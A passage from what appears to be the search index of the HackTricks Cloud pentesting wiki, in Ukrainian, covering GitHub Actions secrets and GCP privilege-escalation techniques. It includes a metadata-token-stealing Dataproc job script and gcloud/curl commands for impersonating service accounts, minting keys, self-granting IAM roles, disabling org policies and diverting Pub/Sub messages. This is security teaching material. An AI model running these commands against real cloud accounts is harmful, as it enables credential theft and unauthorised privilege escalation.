eadcrumbs":9,"title":1},"999":{"body":30,"breadcrumbs":10,"title":2}},"docs":{"0":{"body":"Reading time: 2 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github. Логотипи Hacktricks та анімація розроблені @ppiernacho .","breadcrumbs":"HackTricks Cloud » HackTricks Cloud","id":"0","title":"HackTricks Cloud"},"1":{"body":"bash # Download latest version of hacktricks cloud\ngit clone https://github.com/HackTricks-wiki/hacktricks-cloud\n# Run the docker container indicating the path to the hacktricks-cloud folder\ndocker run -d --rm -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c \"cd /app && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0\" Ваша локальна копія HackTricks Cloud буде доступна за http://localhost:3377 через хвилину.","breadcrumbs":"HackTricks Cloud » Запустіть HackTricks Cloud локально","id":"1","title":"Запустіть HackTricks Cloud локально"},"10":{"body":"Найпоширеніший спосіб визначити пайплайн - це використання файлу конфігурації CI, розміщеного в репозиторії , який будує пайплайн. Цей файл описує порядок виконуваних завдань, умови, які впливають на потік, і налаштування середовища збірки. Ці файли зазвичай мають послідовну назву та формат, наприклад — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI) та YAML файли GitHub Actions, розташовані під .github/workflows. Коли пайплайн ініціюється, завдання пайплайна витягує код з вибраного джерела (наприклад, коміт / гілка) і виконує команди, зазначені у файлі конфігурації CI проти цього коду. Отже, остаточною метою зловмисника є якимось чином скомпрометувати ці файли конфігурації або команди, які вони виконують .","breadcrumbs":"Pentesting CI/CD Methodology » Pipelines Pentesting Methodology","id":"10","title":"Pipelines Pentesting Methodology"},"100":{"body":"У https://github.com/organizations//settings/actions можна перевірити налаштування github actions для організації. Можна заборонити використання github actions повністю, дозволити всі github actions або просто дозволити певні дії. Також можна налаштувати хто потребує схвалення для запуску Github Action та дозволи GITHUB_TOKEN Github Action, коли вона запускається.","breadcrumbs":"Github Security » Basic Github Information » Налаштування","id":"100","title":"Налаштування"},"1000":{"body":"Reading time: 2 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » GCP Dataproc Privilege Escalation","id":"1000","title":"GCP Dataproc Privilege Escalation"},"1001":{"body":"GCP - Dataproc Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » Dataproc","id":"1001","title":"Dataproc"},"1002":{"body":"Мені не вдалося отримати зворотний шелл за допомогою цього методу, однак можливо витягти токен SA з кінцевої точки метаданих, використовуючи метод, описаний нижче. Кроки для експлуатації Розмістіть скрипт завдання в GCP Bucket Подайте завдання до кластера Dataproc. Використовуйте завдання для доступу до сервера метаданих. Витягніть токен облікового запису служби, що використовується кластером. python import requests metadata_url = \"http://metadata/computeMetadata/v1/instance/service-accounts/default/token\"\nheaders = {\"Metadata-Flavor\": \"Google\"} def fetch_metadata_token():\ntry:\nresponse = requests.get(metadata_url, headers=headers, timeout=5)\nresponse.raise_for_status()\ntoken = response.json().get(\"access_token\", \"\")\nprint(f\"Leaked Token: {token}\")\nreturn token\nexcept Exception as e:\nprint(f\"Error fetching metadata token: {e}\")\nreturn None if __name__ == \"__main__\":\nfetch_metadata_token() bash # Copy the script to the storage bucket\ngsutil cp gs:/// # Submit the malicious job\ngcloud dataproc jobs submit pyspark gs:/// \\\n--cluster= \\\n--region= tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get","id":"1002","title":"dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get"},"1003":{"body":"Reading time: 2 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » GCP - Deploymentmaneger Privesc","id":"1003","title":"GCP - Deploymentmaneger Privesc"},"1004":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager","id":"1004","title":"deploymentmanager"},"1005":{"body":"Ця єдина дозволена дія дозволяє вам запускати нові розгортання ресурсів у GCP з довільними обліковими записами служби. Ви, наприклад, можете запустити обчислювальний екземпляр з SA, щоб ескалювати до нього. Ви насправді можете запустити будь-який ресурс , зазначений у gcloud deployment-manager types list У оригінальному дослідженні використовується скрипт для розгортання обчислювального екземпляра, однак цей скрипт не працюватиме. Перевірте скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.create","id":"1005","title":"deploymentmanager.deployments.create"},"1006":{"body":"Це схоже на попереднє зловживання, але замість створення нового розгортання ви модифікуєте вже існуюче (тому будьте обережні) Перевірте скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.update","id":"1006","title":"deploymentmanager.deployments.update"},"1007":{"body":"Це схоже на попереднє зловживання, але замість безпосереднього створення нового розгортання, спочатку ви надаєте собі цей доступ, а потім зловживаєте дозволом, як пояснено в попередньому розділі deploymentmanager.deployments.create .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.setIamPolicy","id":"1007","title":"deploymentmanager.deployments.setIamPolicy"},"1008":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » References","id":"1008","title":"References"},"1009":{"body":"Reading time: 8 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » GCP - IAM Privesc","id":"1009","title":"GCP - IAM Privesc"},"101":{"body":"Github Action зазвичай потребує деяких секретів для взаємодії з github або сторонніми додатками. Щоб уникнути їх розміщення у відкритому тексті в репозиторії, github дозволяє розміщувати їх як Secrets . Ці секрети можуть бути налаштовані для репозиторію або для всієї організації . Тоді, щоб Action могла отримати доступ до секрету , вам потрібно оголосити його так: yaml steps:\n- name: Hello world action\nwith: # Set the secret as an input\nsuper_secret:${{ secrets.SuperSecret }}\nenv: # Or as an environment variable\nsuper_secret:${{ secrets.SuperSecret }} Приклад використання Bash yaml steps:\n- shell: bash\nenv: SUPER_SECRET:${{ secrets.SuperSecret }}\nrun: |\nexample-command \"$SUPER_SECRET\" warning Секрети можна отримати лише з Github Actions , які їх оголосили. Після налаштування в репозиторії або організаціях користувачі github не зможуть отримати до них доступ знову , вони зможуть лише змінювати їх . Отже, єдиний спосіб вкрасти секрети github - це мати доступ до машини, яка виконує Github Action (в цьому сценарії ви зможете отримати доступ лише до секретів, оголошених для Action).","breadcrumbs":"Github Security » Basic Github Information » Git Secrets","id":"101","title":"Git Secrets"},"1010":{"body":"Знайдіть більше інформації про IAM у: GCP - IAM, Principals & Org Policies Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » IAM","id":"1010","title":"IAM"},"1011":{"body":"Зловмисник з вказаними дозволами зможе оновити роль, призначену вам, і надати вам додаткові дозволи на інші ресурси, такі як: bash gcloud iam roles update --project --add-permissions Ви можете знайти скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут і python-скрипт для зловживання цими привілеями тут . Для отримання додаткової інформації перегляньте оригінальне дослідження .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.roles.update (iam.roles.get)","id":"1011","title":"iam.roles.update (iam.roles.get)"},"1012":{"body":"Зловмисник з вказаними дозволами зможе запросити токен доступу, що належить обліковому запису служби , тому можливо запросити токен доступу облікового запису служби з більшими привілеями, ніж у нас. bash gcloud --impersonate-service-account=\"${victim}@${PROJECT_ID}.iam.gserviceaccount.com\" \\\nauth print-access-token Ви можете знайти скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут та скрипт на python для зловживання цим правом тут . Для отримання додаткової інформації перегляньте оригінальне дослідження .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)","id":"1012","title":"iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)"},"1013":{"body":"Зловмисник з вказаними правами зможе створити ключ, керований користувачем, для облікового запису служби , що дозволить нам отримати доступ до GCP як цей обліковий запис служби. bash gcloud iam service-accounts keys create --iam-account /tmp/key.json gcloud auth activate-service-account --key-file=sa_cred.json Ви можете знайти скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут та python-скрипт для зловживання цим привілеєм тут . Для отримання додаткової інформації перегляньте оригінальне дослідження . Зверніть увагу, що iam.serviceAccountKeys.update не працюватиме для зміни ключа SA, оскільки для цього також потрібні дозволи iam.serviceAccountKeys.create.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccountKeys.create","id":"1013","title":"iam.serviceAccountKeys.create"},"1014":{"body":"Якщо у вас є iam.serviceAccounts.implicitDelegation дозвіл на обліковий запис служби, який має дозвіл iam.serviceAccounts.getAccessToken на третьому обліковому записі служби, то ви можете використовувати implicitDelegation для створення токена для цього третього облікового запису служби . Ось діаграма, яка допоможе пояснити. Зверніть увагу, що відповідно до документації , делегування gcloud працює лише для генерації токена за допомогою методу generateAccessToken() . Отже, ось як отримати токен, використовуючи API безпосередньо: bash curl -X POST \\\n'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'\"${TARGET_SERVICE_ACCOUNT}\"':generateAccessToken' \\\n-H 'Content-Type: application/json' \\\n-H 'Authorization: Bearer '\"$(gcloud auth print-access-token)\" \\\n-d '{\n\"delegates\": [\"projects/-/serviceAccounts/'\"${DELEGATED_SERVICE_ACCOUNT}\"'\"],\n\"scope\": [\"https://www.googleapis.com/auth/cloud-platform\"]\n}' Ви можете знайти скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут та python-скрипт для зловживання цим привілеєм тут . Для отримання додаткової інформації перегляньте оригінальне дослідження .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.implicitDelegation","id":"1014","title":"iam.serviceAccounts.implicitDelegation"},"1015":{"body":"Зловмисник з вказаними дозволами зможе підписувати довільні дані в GCP . Отже, буде можливим створити непідписаний JWT сервісного облікового запису, а потім надіслати його як блоб, щоб отримати підписаний JWT від сервісного облікового запису, на який ми націлюємося. Для отримання додаткової інформації читайте це . Ви можете знайти скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут та python-скрипт для зловживання цим привілеєм тут і тут . Для отримання додаткової інформації перегляньте оригінальне дослідження .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signBlob","id":"1015","title":"iam.serviceAccounts.signBlob"},"1016":{"body":"Зловмисник з вказаними дозволами зможе підписувати коректно сформовані JSON веб-токени (JWT) . Різниця з попереднім методом полягає в тому, що замість того, щоб змусити Google підписати блоб, що містить JWT, ми використовуємо метод signJWT, який вже очікує JWT . Це робить його простішим у використанні, але ви можете підписувати лише JWT, а не будь-які байти. Ви можете знайти скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут та python-скрипт для зловживання цим привілеєм тут . Для отримання додаткової інформації перегляньте оригінальне дослідження .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signJwt","id":"1016","title":"iam.serviceAccounts.signJwt"},"1017":{"body":"Зловмисник з вказаними дозволами зможе додавати політики IAM до сервісних облікових записів . Ви можете зловживати цим, щоб наділити себе дозволами, необхідними для наслідування сервісного облікового запису. У наступному прикладі ми наділяємо себе роллю roles/iam.serviceAccountTokenCreator над цікавим SA: bash gcloud iam service-accounts add-iam-policy-binding \"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" \\\n--member=\"user:username@domain.com\" \\\n--role=\"roles/iam.serviceAccountTokenCreator\" # If you still have prblem grant yourself also this permission\ngcloud iam service-accounts add-iam-policy-binding \"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" \\ \\\n--member=\"user:username@domain.com\" \\\n--role=\"roles/iam.serviceAccountUser\" Ви можете знайти скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.setIamPolicy","id":"1017","title":"iam.serviceAccounts.setIamPolicy"},"1018":{"body":"Дозвіл iam.serviceAccounts.actAs подібний до дозволу iam:PassRole з AWS . Він є необхідним для виконання завдань, таких як ініціювання екземпляра Compute Engine, оскільки надає можливість \"діяти від імені\" облікового запису служби, забезпечуючи безпечне управління дозволами. Без цього користувачі можуть отримати невиправданий доступ. Крім того, експлуатація iam.serviceAccounts.actAs включає різні методи, кожен з яких вимагає набору дозволів, на відміну від інших методів, які потребують лише одного. Імітація облікового запису служби Імітація облікового запису служби може бути дуже корисною для отримання нових і кращих привілеїв . Є три способи, якими ви можете імітувати інший обліковий запис служби : Аутентифікація за допомогою приватних ключів RSA (викладено вище) Авторизація за допомогою політик Cloud IAM (викладено тут) Розгортання завдань на службах GCP (більш застосовно до компрометації облікового запису користувача)","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.actAs","id":"1018","title":"iam.serviceAccounts.actAs"},"1019":{"body":"Зловмисник з вказаними дозволами зможе згенерувати OpenID JWT. Ці токени використовуються для підтвердження особи і не обов'язково містять будь-яку неявну авторизацію щодо ресурсу. Згідно з цим цікавим постом , необхідно вказати аудиторію (сервіс, до якого ви хочете використовувати токен для аутентифікації), і ви отримаєте JWT, підписаний google, що вказує на обліковий запис служби та аудиторію JWT. Ви можете згенерувати OpenIDToken (якщо у вас є доступ) за допомогою: bash # First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA\ngcloud auth activate-service-account --key-file=/path/to/svc_account.json\n# Then, generate token\ngcloud auth print-identity-token \"${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" --audiences=https://example.com Тоді ви можете просто використовувати це для доступу до сервісу за допомогою: bash curl -v -H \"Authorization: Bearer id_token\" https://some-cloud-run-uc.a.run.app Деякі сервіси, які підтримують аутентифікацію за допомогою таких токенів: Google Cloud Run Google Cloud Functions Google Identity Aware Proxy Google Cloud Endpoints (якщо використовується Google OIDC) Ви можете знайти приклад того, як створити OpenID токен від імені облікового запису служби тут .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getOpenIdToken","id":"1019","title":"iam.serviceAccounts.getOpenIdToken"},"102":{"body":"Github дозволяє створювати середовища , де ви можете зберігати секрети . Потім ви можете надати github action доступ до секретів всередині середовища за допомогою чогось на зразок: yaml jobs:\ndeployment:\nruns-on: ubuntu-latest\nenvironment: env_name Ви можете налаштувати середовище, щоб до нього мали доступ всі гілки (за замовчуванням), тільки захищені гілки або вказати , які гілки можуть отримати доступ до нього. Також можна встановити кількість необхідних перевірок перед виконанням дії за допомогою середовища або почекати деякий час перед тим, як дозволити розгортання.","breadcrumbs":"Github Security » Basic Github Information » Git Environments","id":"102","title":"Git Environments"},"1020":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » Посилання","id":"1020","title":"Посилання"},"1021":{"body":"Reading time: 3 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » GCP - KMS Privesc","id":"1021","title":"GCP - KMS Privesc"},"1022":{"body":"Інформація про KMS: GCP - KMS Enum Зверніть увагу, що в KMS дозволи не тільки наследуються від Організацій, Папок і Проектів, але також від Ключових наборів .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » KMS","id":"1022","title":"KMS"},"1023":{"body":"Ви можете використовувати цей дозвіл для дешифрування інформації за допомогою ключа , на який у вас є цей дозвіл. bash gcloud kms decrypt \\\n--location=[LOCATION] \\\n--keyring=[KEYRING_NAME] \\\n--key=[KEY_NAME] \\\n--version=[KEY_VERSION] \\\n--ciphertext-file=[ENCRYPTED_FILE_PATH] \\\n--plaintext-file=[DECRYPTED_FILE_PATH]","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecrypt","id":"1023","title":"cloudkms.cryptoKeyVersions.useToDecrypt"},"1024":{"body":"Зловмисник з цим дозволом міг би наділити себе правами на використання ключа для розшифровки інформації. bash gcloud kms keys add-iam-policy-binding [KEY_NAME] \\\n--location [LOCATION] \\\n--keyring [KEYRING_NAME] \\\n--member [MEMBER] \\\n--role roles/cloudkms.cryptoKeyDecrypter","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeys.setIamPolicy","id":"1024","title":"cloudkms.cryptoKeys.setIamPolicy"},"1025":{"body":"Ось концептуальний розбір того, як працює це делегування: Сервісний обліковий запис A має прямий доступ до розшифровки за допомогою конкретного ключа в KMS. Сервісний обліковий запис B отримує дозвіл useToDecryptViaDelegation. Це дозволяє йому запитувати KMS на розшифровку даних від імені Сервісного облікового запису A. Використання цього дозволу є неявним у способі, яким сервіс KMS перевіряє дозволи під час подання запиту на розшифровку. Коли ви робите стандартний запит на розшифровку за допомогою Google Cloud KMS API (на Python або іншій мові), сервіс перевіряє, чи має запитуючий сервісний обліковий запис необхідні дозволи . Якщо запит подається сервісним обліковим записом з дозволом useToDecryptViaDelegation , KMS перевіряє, чи дозволено цьому обліковому запису запитувати розшифровку від імені суб'єкта, який володіє ключем . Налаштування для делегування Визначте користувацьку роль : Створіть файл YAML (наприклад, custom_role.yaml), який визначає користувацьку роль. Цей файл повинен містити дозвіл cloudkms.cryptoKeyVersions.useToDecryptViaDelegation. Ось приклад того, як може виглядати цей файл: yaml title: \"KMS Decryption via Delegation\"\ndescription: \"Allows decryption via delegation\"\nstage: \"GA\"\nincludedPermissions:\n- \"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation\" Створіть користувацьку роль за допомогою gcloud CLI : Використовуйте наступну команду, щоб створити користувацьку роль у вашому проекті Google Cloud: bash gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml Замініть [YOUR_PROJECT_ID] на ідентифікатор вашого проекту Google Cloud. Надайте користувацьку роль обліковому запису служби : Призначте вашу користувацьку роль обліковому запису служби, який буде використовувати цей дозвіл. Використовуйте наступну команду: bash # Give this permission to the service account to impersonate\ngcloud projects add-iam-policy-binding [PROJECT_ID] \\\n--member \"serviceAccount:[SERVICE_ACCOUNT_B_EMAIL]\" \\\n--role \"projects/[PROJECT_ID]/roles/[CUSTOM_ROLE_ID]\" # Give this permission over the project to be able to impersonate any SA\ngcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \\\n--member=\"serviceAccount:[SERVICE_ACCOUNT_EMAIL]\" \\\n--role=\"projects/[YOUR_PROJECT_ID]/roles/kms_decryptor_via_delegation\" Замініть [YOUR_PROJECT_ID] та [SERVICE_ACCOUNT_EMAIL] на ваш ідентифікатор проєкту та електронну пошту облікового запису служби відповідно. tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecryptViaDelegation","id":"1025","title":"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"},"1026":{"body":"Reading time: 2 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » GCP - Orgpolicy Privesc","id":"1026","title":"GCP - Orgpolicy Privesc"},"1027":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy","id":"1027","title":"orgpolicy"},"1028":{"body":"Зловмисник, що використовує orgpolicy.policy.set , може маніпулювати організаційними політиками, що дозволить йому зняти певні обмеження, які заважають конкретним операціям. Наприклад, обмеження appengine.disableCodeDownload зазвичай блокує завантаження вихідного коду App Engine. Однак, використовуючи orgpolicy.policy.set , зловмисник може деактивувати це обмеження, отримавши доступ до завантаження вихідного коду, незважаючи на те, що спочатку він був захищений. bash # Get info\ngcloud resource-manager org-policies describe [--folder | --organization | --project ] # Disable\ngcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ] Скрипт на python для цього методу можна знайти тут .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy.policy.set","id":"1028","title":"orgpolicy.policy.set"},"1029":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » Посилання","id":"1029","title":"Посилання"},"103":{"body":"Github Action може бути виконаний у середовищі github або може бути виконаний на інфраструктурі третьої сторони , налаштованій користувачем. Декілька організацій дозволяють запускати Github Actions на інфраструктурі третьої сторони , оскільки це зазвичай дешевше . Ви можете перелічити самостійно хостовані ранери організації за адресою https://github.com/organizations//settings/actions/runners Спосіб знайти, які Github Actions виконуються в не-github інфраструктурі , - це шукати runs-on: self-hosted у конфігурації yaml Github Action. Неможливо запустити Github Action організації всередині самостійно хостованого середовища іншої організації, оскільки унікальний токен генерується для Ранера під час його налаштування, щоб знати, до якої організації належить ранер. Якщо кастомний Github Runner налаштований на машині всередині AWS або GCP , наприклад, Action може отримати доступ до кінцевої точки метаданих і викрасти токен облікового запису служби , з яким працює машина.","breadcrumbs":"Github Security » Basic Github Information » Git Action Runner","id":"103","title":"Git Action Runner"},"1030":{"body":"Reading time: 2 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » GCP - Pubsub Privesc","id":"1030","title":"GCP - Pubsub Privesc"},"1031":{"body":"Отримайте більше інформації в: GCP - Pub/Sub Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » PubSub","id":"1031","title":"PubSub"},"1032":{"body":"Снапшоти тем містять поточні не підтверджені повідомлення та кожне повідомлення після нього . Ви можете створити снапшот теми, щоб отримати доступ до всіх повідомлень , уникаючи доступу до теми безпосередньо .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.create","id":"1032","title":"pubsub.snapshots.create"},"1033":{"body":"Призначте попередні дозволи собі.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.setIamPolicy","id":"1033","title":"pubsub.snapshots.setIamPolicy"},"1034":{"body":"Ви можете створити push-підписку в темі, яка буде надсилати всі отримані повідомлення на вказану URL-адресу.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.create","id":"1034","title":"pubsub.subscriptions.create"},"1035":{"body":"Встановіть свою власну URL-адресу як точку доступу для крадіжки повідомлень.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.update","id":"1035","title":"pubsub.subscriptions.update"},"1036":{"body":"Отримуйте доступ до повідомлень за допомогою підписки.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.consume","id":"1036","title":"pubsub.subscriptions.consume"},"1037":{"body":"Надайте собі будь-які з попередніх дозволів. tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.setIamPolicy","id":"1037","title":"pubsub.subscriptions.setIamPolicy"},"1038":{"body":"Reading time: 1 minute tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або 